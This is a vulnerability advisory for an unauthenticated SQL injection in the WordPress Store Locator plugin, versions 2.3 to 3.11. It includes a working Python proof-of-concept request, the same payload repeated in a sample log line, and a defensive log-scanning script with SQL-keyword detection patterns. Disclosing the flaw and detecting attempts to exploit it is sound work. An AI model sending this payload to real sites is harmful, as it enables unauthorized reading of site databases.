WordPress Store Locator 2.3 - 3.11, SQL Injection
Because the script passes the $_GET array to PHP's extract() function, an unauthenticated user can overwrite variables inside the script and so craft a request that injects arbitrary SQL into the query later built from those variables. The result of that query is then returned as XML.
Homepage
https://wordpress.org/plugins/store-locator/
CVSS Score
6.4
CVSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 3.12
Proof of Concept
On a default installation, the following script, when executed, returns an XML document containing a list of tables from the information_schema database. Note that in this example the attacker must know the name of the Store Locator table. It may be possible to perform this attack without knowing the prefix of the WordPress table names.
```python
import requests

# Target script: the plugin's XML endpoint on a local default installation.
url = "http://localhost/wp-content/plugins/store-locator/sl-xml.php"

# sl_custom_fields is swallowed by extract($_GET) and spliced into the query;
# the table name wp_store_locator assumes the default wp_ prefix.
payload = {
    "sl_xml_columns[]": ["sqli"],
    "sl_custom_fields": ", information_schema.tables.table_name as sqli FROM wp_store_locator LEFT JOIN information_schema.tables ON 1=1--",
    "debug": "1",
}

r = requests.get(url, params=payload)
print(r.text)
```
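For defenders reviewing web server logs, the following is an added example (not part of the original advisory and not the plugin's code) that flags requests to sl-xml.php whose query parameters carry SQL fragments, or that set sl_custom_fields at all, since the proof of concept above shows that name being pushed into the script through extract(). The log lines are constructed; the first one carries the same query string the proof of concept sends. The assumption that legitimate clients never send sl_custom_fields is mine, not a statement from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined"-style format; not real traffic.
# The first line carries the same query the advisory's proof of concept sends.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Oct/2014:10:01:02 +0000] "GET /wp-content/plugins/store-locator/sl-xml.php?sl_xml_columns%5B%5D=sqli&sl_custom_fields=%2C+information_schema.tables.table_name+as+sqli+FROM+wp_store_locator+LEFT+JOIN+information_schema.tables+ON+1%3D1--&debug=1 HTTP/1.1" 200 5120
198.51.100.7 - - [27/Oct/2014:10:02:15 +0000] "GET /wp-content/plugins/store-locator/sl-xml.php?sl_lat=40.7&sl_lng=-74.0&sl_radius=25 HTTP/1.1" 200 842
192.0.2.9 - - [27/Oct/2014:10:03:44 +0000] "GET /index.php?p=12 HTTP/1.1" 200 9931
"""

# Request portion of a combined-format access log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# SQL keywords, comment openers and schema names that have no business in a
# store-locator query parameter.
SQL_FRAGMENT = re.compile(
    r"(?i)\b(union|select|from|join|information_schema)\b|--|/\*"
)

# Parameter names the proof of concept shows being pushed into the script's
# variable scope through extract(). Assumption (mine): a legitimate client
# never sends these, so their presence alone is worth an alert.
INTERNAL_VARS = {"sl_custom_fields"}


def find_sqli_requests(log_text, script="sl-xml.php"):
    """Return one record per suspicious query parameter sent to `script`."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request entry
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/" + script):
            continue
        # parse_qs decodes %XX and '+', so the check sees what PHP's $_GET sees.
        params = parse_qs(parts.query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                reasons = []
                if name in INTERNAL_VARS:
                    reasons.append("internal_variable")
                if SQL_FRAGMENT.search(value):
                    reasons.append("sql_fragment")
                if reasons:
                    hits.append({
                        "ip": m.group("ip"),
                        "time": m.group("ts"),
                        "param": name,
                        "value": value,
                        "reasons": reasons,
                    })
    return hits


if __name__ == "__main__":
    for hit in find_sqli_requests(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["param"]} {hit["reasons"]}: {hit["value"]!r}')
```

Decoding the query string before matching matters: the injected comma, spaces and `=` arrive percent- or plus-encoded, so a pattern applied to the raw request line would miss them. Run over the constructed sample, only the first line is reported, with both reasons attached to its sl_custom_fields parameter.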
Timeline
- 2014-10-27: Discovered
- 2014-10-27: Vendor notified
- 2014-10-27: Vendor responded with intent to fix
- 2014-10-29: Version 3.12 released – issue resolved
- 2014-11-03: CVE requested
- 2014-11-05: CVE assigned
- 2014-11-05: Advisory released